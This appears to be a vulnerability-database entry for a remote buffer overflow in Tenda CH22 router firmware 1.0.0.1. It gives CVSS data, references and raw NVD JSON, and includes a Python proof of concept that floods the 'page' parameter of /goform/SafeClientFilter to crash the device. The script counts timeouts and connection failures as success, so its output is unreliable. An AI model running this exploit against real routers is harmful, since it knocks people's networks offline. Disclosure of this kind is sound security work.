CVE-2025-12232

Description

A vulnerability was detected in Tenda CH22 1.0.0.1. Affected by this vulnerability is the function fromSafeClientFilter of the file /goform/SafeClientFilter. Performing a manipulation of the argument page results in buffer overflow. The attack can be initiated remotely. The exploit is now public and may be used.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tenda:ch22_firmware:1.0.0.1:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tenda:ch22:*:*:*:*:*:*:*:* - NOT VULNERABLE

Tenda CH22 固件 1.0.0.1（受影响）

其他使用相同Web组件的Tenda路由器型号（可能受影响）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-12232 PoC - Tenda CH22 Buffer Overflow in SafeClientFilter
# Target: Tenda CH22 Router (Firmware 1.0.0.1)
# Vulnerability: Buffer overflow via page parameter in /goform/SafeClientFilter

def exploit(target_ip, target_port=80):
    """
    Exploit buffer overflow in fromSafeClientFilter function
    """
    target_url = f"http://{target_ip}:{target_port}/goform/SafeClientFilter"
    
    # Generate payload with excessive length to trigger buffer overflow
    # Typical buffer size in embedded systems is 256-1024 bytes
    # We use 2000+ bytes to ensure overflow occurs
    payload_size = 2048
    overflow_payload = "A" * payload_size
    
    # Construct malicious request
    data = {
        "page": overflow_payload,
        "form": "SafeClientFilter"
    }
    
    try:
        print(f"[*] Sending exploit payload to {target_url}")
        print(f"[*] Payload size: {payload_size} bytes")
        
        response = requests.post(target_url, data=data, timeout=10)
        
        print(f"[+] Request sent successfully")
        print(f"[*] Response status: {response.status_code}")
        
        return True
        
    except requests.exceptions.Timeout:
        print("[!] Request timed out - target may be vulnerable and crashed")
        return True
    except requests.exceptions.ConnectionError:
        print("[!] Connection failed - target may be down (DoS successful)")
        return True
    except Exception as e:
        print(f"[!] Error: {str(e)}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-12232.py <target_ip> [port]")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    
    exploit(target, port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12232
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12232
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12232/
[4] VulDB https://vuldb.com/cve/CVE-2025-12232
[5] https://github.com/QIU-DIE/CVE/issues/13
[6] https://vuldb.com/?ctiid.329902
[7] https://vuldb.com/?id.329902
[8] https://vuldb.com/?submit.673713
[9] https://www.tenda.com.cn/
[10] https://github.com/QIU-DIE/CVE/issues/13

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12232", "sourceIdentifier": "[email protected]", "published": "2025-10-27T07:15:37.900", "lastModified": "2026-02-24T08:16:22.820", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in Tenda CH22 1.0.0.1. Affected by this vulnerability is the function fromSafeClientFilter of the file /goform/SafeClientFilter. Performing a manipulation of the argument page results in buffer overflow. The attack can be initiated remotely. The exploit is now public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:ch22_firmware:1.0.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "DB66174F-9460-4B60-AC6B-1B8D5700D6A0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:ch22:*:*:*:*:*:*:*:*", "matchCriteriaId": "9E4E8089-E529-4895-AD77-82A2458BA199"}]}]}], "references": [{"url": "https://github.com/QIU-DIE/CVE/issues/13", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.329902", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329902", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.673713", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.tenda.com.cn/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/QIU-DIE/CVE/issues/13", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}